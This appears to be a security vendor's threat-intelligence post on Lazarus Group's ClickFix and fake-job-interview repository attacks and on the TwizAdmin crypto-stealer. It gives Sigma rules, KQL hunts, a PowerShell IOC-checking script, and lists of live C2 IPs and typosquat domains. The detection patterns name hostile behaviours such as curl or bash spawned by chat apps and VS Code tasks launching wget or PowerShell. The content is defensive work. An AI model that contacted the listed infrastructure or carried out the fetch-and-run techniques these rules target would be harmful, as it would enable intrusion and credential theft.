Back to Intelligence

Lazarus Group & DataBreachPlus: Multi-Platform APT Campaigns Involving Mach-O Man, TwizAdmin & Supply Chain Attacks

SA
Security Arsenal Team
April 22, 2026
6 min read

Excerpt

Active campaigns target Finance/Tech with macOS ClickFix malware, dev supply chain compromise, and multi-stage crypto-stealers.

Threat Summary

Recent intelligence reveals a convergence of sophisticated APT activity targeting the Technology and Finance sectors. The Lazarus Group (tracked as Void Dokkaebi/WageMole) is executing dual-pronged operations: a social engineering campaign leveraging "ClickFix" techniques to deliver the Mach-O Man malware to macOS users, and a supply chain attack using fake job interviews to poison code repositories (DEV#POPPER RAT). Simultaneously, the DataBreachPlus actor is pushing the TwizAdmin suite, a modular threat featuring crypto-clippers, ransomware (crpx0), and a Java RAT, targeting both Windows and macOS users via shipping lures. Collectively, these campaigns emphasize credential theft, financial compromise, and persistent access through developer environments.

Threat Actor / Malware Profile

Lazarus Group (WageMole / Void Dokkaebi)

Malware Families: Mach-O Man, PyLangGhostRAT, DEV#POPPER RAT, InvisibleFerret, BeaverTail. Distribution:

  • ClickFix: Fake meeting invitations via Telegram redirect to fraudulent collaboration sites (Zoom/Teams). Victims are tricked into running terminal commands to "fix" connection issues, executing the malware.
  • Supply Chain: Fake job interviews lure developers into cloning malicious Git repositories. Malicious VS Code task configurations execute payloads upon opening the project. Behavior:
  • Mach-O Man: Steals browser data and credentials, exfiltrating via Telegram. Uses Python-based RAT capabilities.
  • Dev Targeting: Self-propagates through repository tampering. Focuses on stealing blockchain infrastructure credentials and developer tokens.

DataBreachPlus

Malware Families: TwizAdmin, crpx0. Distribution: Phishing campaigns impersonating logistics entities (e.g., FedEx). Behavior:

  • Multi-Stage: Begins as a clipboard hijacker for 8+ cryptocurrency chains. Escalates to BIP-39 seed phrase theft and browser credential exfiltration.
  • Ransomware: Deploys the crpx0 ransomware module.
  • C2: Managed via a FastAPI-based panel at 103.241.66[.]238:1337 with a license key system. Utilizes a Java RAT for remote access.

IOC Analysis

The current indicator set reveals a multi-faceted infrastructure:

  • Network Infrastructure: Actors are utilizing specific IP blocks (e.g., 166.88.4.2, 23.27.20.143) likely hosting C2 nodes. The TwizAdmin operation specifically uses port 1337 on C2.
  • Typosquatting: The domain livemicrosft.com is used in the ClickFix campaign to impersonate Microsoft.
  • File Payloads: A high volume of SHA256 hashes corresponds to Mach-O binaries (macOS) and Windows payloads. Operational Guidance: SOC teams should immediately block the listed IPs and domains at the perimeter. EDR solutions should be configured to quarantine files matching the provided hashes. Due to the use of non-standard ports (1337) and legitimate platforms (Telegram) for C2, network detection must rely on behavioral anomalies rather than simple port blocking.

Detection Engineering

Sigma Rules

YAML
---
title: Potential macOS ClickFix Activity via Terminal
id: 4a8b1c9d-5e6f-4a3b-8c9d-1e2f3a4b5c6d
description: Detects execution of curl or bash commands spawned by communication applications or browsers, indicative of ClickFix social engineering attacks.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
condition: selection and selection_cli
selection:
    ParentImage|endswith:
        - '/Telegram'
        - '/Teams'
        - '/Zoom'
        - '/Google Chrome'
        - '/Safari'
selection_cli:
    Image|endswith:
        - '/bash'
        - '/sh'
        - '/curl'
        - '/osascript'
    CommandLine|contains:
        - 'curl'
        - 'bash -c'
falsepositives:
    - Legitimate developer workflows (rare when initiated by chat apps)
level: high
---
title: VS Code Supply Chain Compromise via Tasks
id: 7d8e9f0a-1b2c-3d4e-5f6a-7b8c9d0e1f2a
description: Detects execution of suspicious child processes by VS Code, often associated with malicious task configurations in poisoned repositories.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
condition: selection and not filter
selection:
    ParentImage|contains:
        - 'Code.exe'
        - 'Visual Studio Code'
    Image|endswith:
        - '/node'
        - '/python'
        - '/bash'
        - '/powershell.exe'
        - '/cmd.exe'
        - '/wget'
filter:
    CommandLine|contains:
        - 'git '
        - 'npm install'
        - 'npm run'
falsepositives:
    - Legitimate build tasks and extension usage
level: medium
---
title: TwizAdmin Java RAT C2 Communication
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects Java processes initiating network connections to non-standard ports or specific C2 infrastructure associated with TwizAdmin.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
condition: selection
selection:
    Image|endswith:
        - '\java.exe'
        - '\javaw.exe'
        - '/java'
    DestinationPort|endswith:
        - ':1337'
        - ':8080'
        - ':4444'
    Initiated: 'true'
falsepositives:
    - Legitimate Java application servers on non-standard ports
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix patterns: Terminal commands launched by Chat/Browsers
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName in~ ('Teams.exe', 'Telegram.exe', 'Zoom.exe', 'chrome.exe', 'msedge.exe', 'Safari')
| where ProcessFileName in~ ('bash.exe', 'sh', 'curl.exe', 'powershell.exe', 'cmd.exe')
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessFileName, CommandLine
| order by Timestamp desc

// Hunt for C2 Connections related to Void Dokkaebi and TwizAdmin
DeviceNetworkEvents
| where Timestamp >= ago(7d)
| where RemoteIP has_any ('31.31.198.206', '166.88.4.2', '85.239.62.36', '23.27.20.143', '154.91.0.196', '198.105.127.210') or RemoteUrl in~ ('livemicrosft.com', 'fanonlyatn.xyz')
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, InitiatingProcessFileName
| order by Timestamp desc

PowerShell IOC Hunt Script

PowerShell
# IOC Hunt for TwizAdmin and Void Dokkaebi Infrastructure
# Checks active network connections for known malicious IPs

$MaliciousIPs = @(
    '31.31.198.206',
    '166.88.4.2',
    '85.239.62.36',
    '23.27.20.143',
    '23.27.202.27',
    '23.27.120.142',
    '154.91.0.196',
    '198.105.127.210',
    '83.168.68.219'
)

Write-Host "Checking for active connections to known IOCs..." -ForegroundColor Yellow

$ActiveConnections = Get-NetTCPConnection -State Established | 
    Where-Object { $MaliciousIPs -contains $_.RemoteAddress }

if ($ActiveConnections) {
    Write-Host "WARNING: Found active connections to malicious infrastructure:" -ForegroundColor Red
    foreach ($Conn in $ActiveConnections) {
        $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            LocalAddress  = $Conn.LocalAddress
            LocalPort     = $Conn.LocalPort
            RemoteAddress = $Conn.RemoteAddress
            RemotePort    = $Conn.RemotePort
            ProcessName   = $Process.ProcessName
            PID           = $Conn.OwningProcess
        } | Format-List
    }
} else {
    Write-Host "No active connections to listed IPs found." -ForegroundColor Green
}

# Check for presence of suspicious domains in DNS Cache (Best Effort)
Write-Host "Checking DNS Cache for suspicious domains..." -ForegroundColor Yellow
$SuspiciousDomains = @('livemicrosft.com', 'fanonlyatn.xyz')
Get-DnsClientCache | Where-Object { $SuspiciousDomains -contains $_.Entry } | Select-Object Entry, Data, TimeToLive

Response Priorities

Immediate:

  • Block all listed IPv4 addresses and domains (fanonlyatn.xyz, livemicrosft.com) at the firewall and proxy level.
  • Quarantine endpoints matching the provided file hashes.
  • Hunt for VS Code tasks in developer environments that execute scripts on window.onload.

24h:

  • Initiate credential rotation for developers and finance staff who may have been targeted by Mach-O Man or TwizAdmin.
  • Review browser history and extensions on macOS endpoints for signs of "ClickFix" interaction (visiting fake meeting links).
  • Audit git repositories for recent commits from unknown contributors or suspicious CI/CD pipeline changes.

1 week:

  • Harden developer environments: Restrict VS Code workspace trust and disable automatic task execution.
  • Conduct security awareness training specifically focused on "ClickFix" social engineering (fake browser errors requiring terminal commands).
  • Implement YARA rules for the detection of Mach-O binaries and Python-based packagers.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptlazarus-grouptwizadminmach-o-manclickfixsupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action